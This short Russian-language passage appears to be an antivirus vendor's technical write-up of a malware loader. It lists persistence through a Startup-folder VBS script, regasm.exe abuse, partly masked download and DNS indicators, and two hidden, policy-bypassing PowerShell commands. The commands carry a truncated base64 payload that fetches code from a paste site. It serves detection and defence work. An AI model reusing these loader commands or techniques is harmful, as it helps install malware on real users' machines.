Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
- $dll[-1..-$dll.length] -join
- %WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe
- http://el##s.store/vbs/15288481603.txt
- DNS ASK pa###bin.com
- DNS ASK el##s.store
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ExecutionPolicy Bypass -NoProfile -Command "$Codigo = 'JGRsbCA9ICdCN0NuZUd3ei93YXIvbW9jLm5pYmV0c2FwLy86c3B0dGgnOyRSdW1wZUQgPSAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZ...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ExecutionPolicy Bypass -NoProfile -Command "$Codigo = 'JGRsbCA9ICdCN0NuZUd3ei93YXIvbW9jLm5pYmV0c2FwLy86c3B0dGgnOyRSdW1wZUQgPSAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZ...